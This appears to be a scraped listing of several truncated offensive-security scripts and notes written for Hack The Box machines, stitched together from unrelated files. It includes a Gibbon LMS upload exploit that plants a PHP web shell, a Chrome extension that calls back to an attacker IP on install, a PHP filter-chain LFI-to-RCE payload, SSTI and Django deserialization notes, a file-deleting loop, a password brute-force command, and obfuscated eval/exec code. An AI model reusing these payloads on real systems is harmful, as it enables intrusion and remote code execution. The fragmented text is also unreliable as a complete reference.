| import requests | |
| import sys | |
| import base64 | |
| TARGET = "http://frizzdc.frizz.htb" | |
| UPLOAD_PATH = "/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" | |
| SHELL_PATH = "/Gibbon-LMS/b.php" | |
| def generate_payload(cmd_param): | |
| php_payload = f"<?=`{cmd_param}`?>" |
| // https://dev.to/greymd/eq-can-be-critically-vulnerable-338m | |
| // https://ya.maya.st/d/201909a.html | |
| // https://www.nccgroup.com/research-blog/shell-arithmetic-expansion-and-evaluation-abuse/ | |
| // https://github.com/koalaman/shellcheck/issues/3088 | |
| chrome.runtime.onInstalled.addListener(async () => { | |
| const lhost = "10.10.14.210"; | |
| const serverPort = "8081"; | |
| const flaskAddr = "http://127.0.0.1:5000"; |
| // https://githepia.hesge.ch/julien.debray/rpg/-/tree/main/frontend/node_modules/react-native?ref_type=heads | |
| "use strict"; | |
| const TARGET_LIB = "libreactnativejni.so"; | |
| let nativeHooked = false; | |
| let javaHooked = false; | |
| var dumped = false; | |
| function hookCxxReact() { |
| local wezterm = require("wezterm") | |
| local config = wezterm.config_builder() | |
| local act = wezterm.action | |
| local mux = wezterm.mux | |
| config.window_close_confirmation = "NeverPrompt" | |
| wezterm.on("gui-startup", function(cmd) | |
| local tab, pane, window = mux.spawn_window(cmd or {}) | |
| --window:gui_window():maximize() |
| import requests | |
| from bs4 import BeautifulSoup | |
| from pwn import log | |
| import sys, string | |
| def exec(data): | |
| payload = "http://portal.guardian.htb/admin/reports.php?report=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP |
exploit.py is a script to test what payload that exactly triggers while there's no error handling discloses.ssti.txt is a simple SSTI wordlist in the wild.exploit2.py for deserialization attack on Django.while true; do cp -r *djcache /var/tmp/django_cache/; find /var/tmp/django_cache/ -type f -user sandy | while IFS= read -r line; do rm -rf $line; done; done
go run main.go -wordfile /opt/seclists/Passwords/Leaked-Databases/rockyou.txt -timeout 30s -workers 100 -cmd /home/user/.local/bin/pyAesCrypt -- -d web_20250806_120723.zip.aes -p {candidate}
| SIGNED\Access Control Assistance Operators | |
| SIGNED\Account Operators | |
| SIGNED\Administrators | |
| SIGNED\Allowed RODC Password Replication Group | |
| SIGNED\Authenticated Users | |
| SIGNED\Backup Operators | |
| SIGNED\BitLocker Recovery | |
| SIGNED\BranchCache Administrators | |
| SIGNED\BranchCache Hosts | |
| SIGNED\Certificate Service DCOM Access |
| import importlib | |
| from functools import reduce | |
| BITSHIFTED = ["B", "I", "T", "S", "H", "I", "F", "T", "E", "D"] | |
| globals()["x"] = lambda k: eval(k) | |
| globals()["y"] = lambda k: exec(k) | |
| rrrrrrhrrrrrrrrrr = 0x42 | |
| rrrrrrrhrrrrrrrrr = 0x43 | |
| rrrrrrrrhrrrrrrrr = 0x44 |